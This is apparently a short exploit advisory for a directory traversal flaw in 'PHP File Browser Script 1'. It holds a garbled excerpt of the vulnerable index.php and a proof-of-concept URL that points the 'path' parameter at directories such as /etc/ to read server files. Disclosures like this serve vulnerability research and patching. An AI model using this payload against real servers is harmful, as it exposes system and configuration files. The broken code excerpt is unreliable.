# Exploit Title: PHP File Browser Script 1 - Directory Traversal # Dork: N/A # Date: 2018-09-03 # Exploit Author: Azkan Mustafa AkkuA (AkkuS) # Vendor Homepage: https://www.hscripts.com/scripts/php/file-browser.php # Software Link:https://www.hscripts.com/scripts/php/downloads/file-browser-demo.zip # Version: 1.0 # Category: Webapps # Tested on: Kali linux # Description : The "index.php" is vulnerable to directory traversal. # An attacker can see and read all files known by the name # Vulnerable File: index.php Browsing Location: ".ucfirst($loc1)." 77 ".ucfirst($locdem2)." 78 ".ucfirst($locdem3)."
";} 79 else{ 80 echo "Browsing Location: Demo
"; ?> // line 151 # PoC : https://Target/scripts/php/file-browser-demo/index.php?path=[DirectoryName] # You can write the known directory name instead of [DirectoryName]. # Example: '/etc/' or '/var/www/' # https://Target/scripts/php/file-browser-demo/index.php?path=/etc/